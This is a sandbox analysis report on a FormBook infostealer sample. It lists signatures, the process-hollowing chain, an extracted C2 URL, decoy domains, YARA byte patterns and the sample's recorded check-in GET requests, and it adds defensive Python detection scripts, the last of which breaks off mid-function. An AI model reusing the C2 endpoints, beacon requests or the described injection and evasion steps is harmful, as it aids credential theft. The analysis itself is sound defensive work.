
Windows Analysis Report 85vLO1Rpcy.exe

Overview

General Information

Sample Name: 85vLO1Rpcy.exe
Analysis ID: 452681
MD5: 91663bee11ec2466c36ff85805041fff
SHA1: 944de18e73bbcf9807c960ba925641211d46cd6e
SHA256: b764504a2998416edbba85e1495c8311f8cc94f5775ce3413b8d3cbd5acf03d7
Tags: exe, Formbook

Detection

FormBook
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Process Tree

  • System is w10x64
  • 85vLO1Rpcy.exe (PID: 6800 cmdline: 'C:\Users\user\Desktop\85vLO1Rpcy.exe' MD5: 91663BEE11EC2466C36FF85805041FFF)
    • 85vLO1Rpcy.exe (PID: 6872 cmdline: 'C:\Users\user\Desktop\85vLO1Rpcy.exe' MD5: 91663BEE11EC2466C36FF85805041FFF)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cscript.exe (PID: 6116 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: 00D3041E47F99E48DD5FFFEDF60F6304)
          • cmd.exe (PID: 6408 cmdline: /c del 'C:\Users\user\Desktop\85vLO1Rpcy.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
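The tree shows the sequence the signatures below describe: the sample relaunches a copy of itself (the suspended-mode creation and process-hollowing signatures; the unpacked FormBook payload is found at 0x400000 in process 2), the payload runs inside explorer.exe, explorer.exe starts a bare cscript.exe from SysWOW64 as the next host, and that host removes the dropper with cmd /c del. The Sigma scan reported no match, so the following script, an added example that is not Joe Sandbox code and not part of the original analysis, shows detection logic for those three steps written against process-creation events. EVENTS is constructed from the tree above with the image paths and command lines as printed; cmd.exe's image path is not printed and is assumed, and explorer.exe is given no parent because a creation log records its real parent rather than the process that injected into it. The three rules are this example's own heuristics.

```python
"""Detect the injection chain from the process tree in process-creation events.

Added example for this report page; it is not Joe Sandbox code, not a Sigma
rule the sandbox ran, and not part of the original analysis. EVENTS is
constructed from the process tree above; the three rules are this example's
own heuristics.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int      # 0 = parent not known from the report
    image: str
    cmdline: str


# Constructed from the report's process tree. The tree hangs explorer.exe (3424)
# under the second 85vLO1Rpcy.exe because the sample injected into it; a process
# creation log would show explorer.exe's real parent instead, so no parent link
# is recorded here. cmd.exe's image path is not printed in the report and is
# assumed (SysWOW64, since it was launched by the 32-bit cscript.exe).
EVENTS = [
    ProcEvent(6800, 0, r"C:\Users\user\Desktop\85vLO1Rpcy.exe",
              r"'C:\Users\user\Desktop\85vLO1Rpcy.exe'"),
    ProcEvent(6872, 6800, r"C:\Users\user\Desktop\85vLO1Rpcy.exe",
              r"'C:\Users\user\Desktop\85vLO1Rpcy.exe'"),
    ProcEvent(3424, 0, r"C:\Windows\Explorer.EXE", r"C:\Windows\Explorer.EXE"),
    ProcEvent(6116, 3424, r"C:\Windows\SysWOW64\cscript.exe",
              r"C:\Windows\SysWOW64\cscript.exe"),
    ProcEvent(6408, 6116, r"C:\Windows\SysWOW64\cmd.exe",
              r"/c del 'C:\Users\user\Desktop\85vLO1Rpcy.exe'"),
    ProcEvent(6404, 6408, r"C:\Windows\system32\conhost.exe",
              r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
]

# cmd.exe /c del <path>, with the path optionally wrapped in single or double quotes.
DEL_RE = re.compile(r"""/c\s+del\s+["']?([^"']+?)["']?\s*$""", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def has_no_arguments(ev: ProcEvent) -> bool:
    """True when the command line is nothing but the (optionally quoted) image path."""
    return ev.cmdline.strip().strip("'\"").lower() == ev.image.lower()


def detect(events: list) -> list:
    """Return (rule_name, pid) pairs for the three steps of the chain."""
    by_pid = {ev.pid: ev for ev in events}
    observed_images = {ev.image.lower() for ev in events}
    hits = []
    for ev in events:
        parent = by_pid.get(ev.ppid)
        # 1. A process launching its own executable with an identical command
        #    line: the child that the suspended-mode creation and the
        #    process-hollowing signatures refer to.
        if parent and parent.image.lower() == ev.image.lower() \
                and parent.cmdline == ev.cmdline:
            hits.append(("self_spawn", ev.pid))
        # 2. explorer.exe starting a SysWOW64 binary with no arguments, the way
        #    the injected code picked cscript.exe as its next host in this run.
        #    Hunting-grade: interactive use can do this too, so tune per estate.
        if parent and basename(parent.image) == "explorer.exe" \
                and "\\syswow64\\" in ev.image.lower() and has_no_arguments(ev):
            hits.append(("explorer_spawns_bare_syswow64_binary", ev.pid))
        # 3. cmd.exe /c del of an executable that ran in this session (self-delete).
        m = DEL_RE.search(ev.cmdline)
        if basename(ev.image) == "cmd.exe" and m \
                and m.group(1).strip().lower() in observed_images:
            hits.append(("deletes_observed_executable", ev.pid))
    return hits


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule:40} pid {pid}")
```

Rule 3 keys on the deleted path being the image of a process seen in the same session rather than on the parent chain, because the injection step breaks the parent chain in real telemetry (cmd.exe's ancestors are cscript.exe and explorer.exe, never the dropper).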

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.extinctionbrews.com/dy8g/"], "decoy": ["mzyxi-rkah-y.net", "okinawarongnho.com", "qq66520.com", "nimbus.watch", "cwdelrio.com", "regalshopper.com", "avito-payment.life", "jorgeporcayo.com", "galvinsky.digital", "guys-only.com", "asmfruits-almacenes.com", "boatrace-life04.net", "cochez.club", "thelastvictor.net", "janieleconte.com", "ivoirepneus.com", "saludflv.info", "mydreamtv.net", "austinphy.com", "cajunseafoodstcloud.com", "13006608192.com", "clear3media.com", "thegrowclinic.com", "findfoodshop.com", "livegaming.store", "greensei.com", "atmaapothecary.com", "builtbydawn.com", "wthcoffee.com", "melodezu.com", "oikoschain.com", "matcitekids.com", "killrstudio.com", "doityourselfism.com", "monsoonnerd.com", "swissbankmusic.com", "envisionfordheights.com", "invisiongc.net", "aizaibali.com", "professioneconsulenza.net", "chaneabond.com", "theamercianhouseboat.com", "scuolatua.com", "surivaganza.com", "xn--vuq722jwngjre.com", "quiteimediato.space", "ecofingers.com", "manageoceanaccount.com", "cindywillardrealtor.com", "garimpeirastore.online", "tinsley.website", "fitnesstwentytwenty.com", "thenorthgoldline.com", "scuolacounselingroma.com", "iwccgroup.com", "wideawakemomma.com", "anthonysavillemiddleschool.com", "sprinkleresources.com", "ravexim3.com", "onedadtwodudes.com", "shxytl.com", "iriscloudvideo.com", "theshapecreator.com", "vermogenswerte.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000009.00000002.917381925.0000000002930000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000009.00000002.917381925.0000000002930000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.917381925.0000000002930000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166c9:$sqlite3step: 68 34 1C 7B E1
  • 0x167dc:$sqlite3step: 68 34 1C 7B E1
  • 0x166f8:$sqlite3text: 68 38 2A 90 C5
  • 0x1681d:$sqlite3text: 68 38 2A 90 C5
  • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.917639520.0000000004510000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000009.00000002.917639520.0000000004510000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(19 further memory-dump entries are not reproduced here)

Unpacked PEs

Source | Rule | Description | Author | Strings
2.2.85vLO1Rpcy.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
2.2.85vLO1Rpcy.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.85vLO1Rpcy.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166c9:$sqlite3step: 68 34 1C 7B E1
  • 0x167dc:$sqlite3step: 68 34 1C 7B E1
  • 0x166f8:$sqlite3text: 68 38 2A 90 C5
  • 0x1681d:$sqlite3text: 68 38 2A 90 C5
  • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
2.1.85vLO1Rpcy.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
2.1.85vLO1Rpcy.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(13 further unpacked-PE entries are not reproduced here)

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://www.invisiongc.net/dy8g/?4hoDb=MBhh1pO56K3YrZO9qJkl6N96HaWfS+D/lXW6/vw2t4O2Fl+GB2YqMK2ZrZIWjv5Kd9wj&m4L0u=bZcPvDKxdtw | Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000009.00000002.917381925.0000000002930000.00000040.00000001.sdmp | Malware Configuration Extractor: FormBook (C2 list and decoy domains as reproduced under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: 85vLO1Rpcy.exe | ReversingLabs: Detection: 47%
Yara detected FormBook
Source: Yara match | File source: 2.2.85vLO1Rpcy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.85vLO1Rpcy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.85vLO1Rpcy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.85vLO1Rpcy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.85vLO1Rpcy.exe.2080000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.85vLO1Rpcy.exe.2080000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000009.00000002.917381925.0000000002930000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.917639520.0000000004510000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000001.660809606.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.717508813.00000000008A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.917267310.0000000002770000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.717586838.00000000008D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.662578275.0000000002080000.00000040.00000001.sdmp, type: MEMORY
Machine Learning detection for sample
Source: 85vLO1Rpcy.exe | Joe Sandbox ML: detected
Source: 1.2.85vLO1Rpcy.exe.2040000.1.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 9.2.cscript.exe.4c87960.5.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 2.1.85vLO1Rpcy.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.2.85vLO1Rpcy.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.2.cscript.exe.2848758.2.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 1.2.85vLO1Rpcy.exe.2080000.2.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 85vLO1Rpcy.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Source: Binary string: cscript.pdbUGP | source: 85vLO1Rpcy.exe, 00000002.00000002.719059320.0000000000E60000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP | source: explorer.exe, 00000005.00000000.706368480.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP | source: 85vLO1Rpcy.exe, 00000001.00000003.654242589.00000000020F0000.00000004.00000001.sdmp, 85vLO1Rpcy.exe, 00000002.00000002.718159413.0000000000960000.00000040.00000001.sdmp, cscript.exe, 00000009.00000002.917910463.000000000486F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: 85vLO1Rpcy.exe, cscript.exe
Source: Binary string: cscript.pdb | source: 85vLO1Rpcy.exe, 00000002.00000002.719059320.0000000000E60000.00000040.00000001.sdmp
Source: Binary string: wscui.pdb | source: explorer.exe, 00000005.00000000.706368480.0000000005A00000.00000002.00000001.sdmp
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe | Code function: 4x nop then pop esi
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe | Code function: 4x nop then pop ebx
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 4x nop then pop esi
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 4x nop then pop edi

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49769 -> 172.67.129.33:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49769 -> 172.67.129.33:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49769 -> 172.67.129.33:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.extinctionbrews.com/dy8g/
Source: global traffic | HTTP traffic detected: GET /dy8g/?4hoDb=IhkJQD+B0bk6+V2yAPUkLiiPXbQYCeTmh4O7f9n2kBTH706egIRBsrjYfWBeBd2LV0Ma&m4L0u=bZcPvDKxdtw HTTP/1.1 | Host: www.fitnesstwentytwenty.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /dy8g/?4hoDb=qBaU/+yfeYHlIZouGPofXU4iidVfFInHYvrLlGgOmZTTl18u/I/MgAYEWpAR2vhEkSQT&m4L0u=bZcPvDKxdtw HTTP/1.1 | Host: www.melodezu.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /dy8g/?4hoDb=QPKcqu0vMetGK+JfgUD/8nBfSHpRH5kA0PGey6xyb3gkjUZIEhl5tlPdZ8p3XQTNaLSI&m4L0u=bZcPvDKxdtw HTTP/1.1 | Host: www.sprinkleresources.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /dy8g/?4hoDb=B6XRNEXBM36CngModurpGrvJhOmsW28/SGtim1Ppn9j53l0DJdxuAnVFBlFsUFB06+ev&m4L0u=bZcPvDKxdtw HTTP/1.1 | Host: www.professioneconsulenza.net | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /dy8g/?4hoDb=7CAQNvso9+3ggABZu/Jc7fNLxaXC+FNFfFld5zwEvttFhfWBu0C0F7PZZ+Whh9hkxniW&m4L0u=bZcPvDKxdtw HTTP/1.1 | Host: www.iwccgroup.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /dy8g/?4hoDb=zCCrdzdvThYaTASpe/hPmHk7ap5P+ANftyOGnlC77DjfTWm2yZ7w2vU9UFaZ0iHT58J1&m4L0u=bZcPvDKxdtw HTTP/1.1 | Host: www.manageoceanaccount.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /dy8g/?4hoDb=q7jKWIuNsoGkf7/hAqyN1U3v/GjJJAAs8Ri7ihl8JZVwqZwISrlxTPDImX53aDppb+SR&m4L0u=bZcPvDKxdtw HTTP/1.1 | Host: www.jorgeporcayo.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /dy8g/?4hoDb=w4dga09rndu/01Lv7rTrHKYivge6TkGpvuCog6Ry2v7pCfEqSSJxxgGpUElPwYvBfmvX&m4L0u=bZcPvDKxdtw HTTP/1.1 | Host: www.builtbydawn.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /dy8g/?4hoDb=MBhh1pO56K3YrZO9qJkl6N96HaWfS+D/lXW6/vw2t4O2Fl+GB2YqMK2ZrZIWjv5Kd9wj&m4L0u=bZcPvDKxdtw HTTP/1.1 | Host: www.invisiongc.net | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: Joe Sandbox View | IP Address: 162.241.62.54
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Each of the nine GET requests above is sent without a User-Agent header (only Host and Connection are present), which is what the "HTTP GET or POST without a user agent" signature in the list above flags.
Source: unknown | DNS traffic detected: queries for: www.fitnesstwentytwenty.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 22 Jul 2021 15:58:59 GMT | Server: Apache/2.4.18 (Ubuntu) | Content-Length: 278 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at www.melodezu.com Port 80</address></body></html>
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000005.00000000.666867795.0000000002B50000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: cscript.exe, 00000009.00000002.918279591.0000000004E02000.00000004.00000001.sdmp | String found in binary or memory: https://www.builtbydawn.com/dy8g/?4hoDb=w4dga09rndu/01Lv7rTrHKYivge6TkGpvuCog6Ry2v7pCfEqSSJxxgGpUElP
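Every Host header in the captured check-in traffic is a domain from the decoy list; the configured C2 (www.extinctionbrews.com) does not appear in the requests the sandbox recorded, while the URI directory /dy8g/ and the second query parameter are identical across all nine. The following script, an added example that is not Joe Sandbox code and not part of the original analysis, classifies each observed Host against the extracted configuration, reports the fields that stay constant across requests, and counts requests sent without a User-Agent header. CONFIG is copied from the report (decoy list cut down to a subset), the raw requests are reconstructed from the GET lines as recorded, and the host normalisation (dropping the www. prefix, which the Host headers carry but the decoy entries omit) is this example's own logic.

```python
"""Classify observed FormBook check-in requests against the extracted config.

Added example for this report page; it is not Joe Sandbox code and not part of
the original analysis. CONFIG and the request data are copied from the report
(decoy list cut to a subset); the classification logic is this example's own.
"""
from urllib.parse import urlsplit

# Extracted configuration, copied from the "Malware Configuration" section
# (decoy list shortened to the nine contacted domains plus two that were not).
CONFIG = {
    "C2 list": ["www.extinctionbrews.com/dy8g/"],
    "decoy": [
        "fitnesstwentytwenty.com", "melodezu.com", "sprinkleresources.com",
        "professioneconsulenza.net", "iwccgroup.com", "manageoceanaccount.com",
        "jorgeporcayo.com", "builtbydawn.com", "invisiongc.net",
        "qq66520.com", "nimbus.watch",
    ],
}

# Host and 4hoDb value of each GET the sandbox recorded, in report order.
OBSERVED = [
    ("www.fitnesstwentytwenty.com", "IhkJQD+B0bk6+V2yAPUkLiiPXbQYCeTmh4O7f9n2kBTH706egIRBsrjYfWBeBd2LV0Ma"),
    ("www.melodezu.com", "qBaU/+yfeYHlIZouGPofXU4iidVfFInHYvrLlGgOmZTTl18u/I/MgAYEWpAR2vhEkSQT"),
    ("www.sprinkleresources.com", "QPKcqu0vMetGK+JfgUD/8nBfSHpRH5kA0PGey6xyb3gkjUZIEhl5tlPdZ8p3XQTNaLSI"),
    ("www.professioneconsulenza.net", "B6XRNEXBM36CngModurpGrvJhOmsW28/SGtim1Ppn9j53l0DJdxuAnVFBlFsUFB06+ev"),
    ("www.iwccgroup.com", "7CAQNvso9+3ggABZu/Jc7fNLxaXC+FNFfFld5zwEvttFhfWBu0C0F7PZZ+Whh9hkxniW"),
    ("www.manageoceanaccount.com", "zCCrdzdvThYaTASpe/hPmHk7ap5P+ANftyOGnlC77DjfTWm2yZ7w2vU9UFaZ0iHT58J1"),
    ("www.jorgeporcayo.com", "q7jKWIuNsoGkf7/hAqyN1U3v/GjJJAAs8Ri7ihl8JZVwqZwISrlxTPDImX53aDppb+SR"),
    ("www.builtbydawn.com", "w4dga09rndu/01Lv7rTrHKYivge6TkGpvuCog6Ry2v7pCfEqSSJxxgGpUElPwYvBfmvX"),
    ("www.invisiongc.net", "MBhh1pO56K3YrZO9qJkl6N96HaWfS+D/lXW6/vw2t4O2Fl+GB2YqMK2ZrZIWjv5Kd9wj"),
]

# Re-assembled wire format: the report shows exactly this request line and
# header set for every GET (no User-Agent), followed by seven NUL bytes.
RAW_REQUESTS = [
    f"GET /dy8g/?4hoDb={blob}&m4L0u=bZcPvDKxdtw HTTP/1.1\r\n"
    f"Host: {host}\r\nConnection: close\r\n\r\n" + "\x00" * 7
    for host, blob in OBSERVED
]


def parse_request(raw: str) -> dict:
    """Split one HTTP/1.x request into method, target, lower-cased headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
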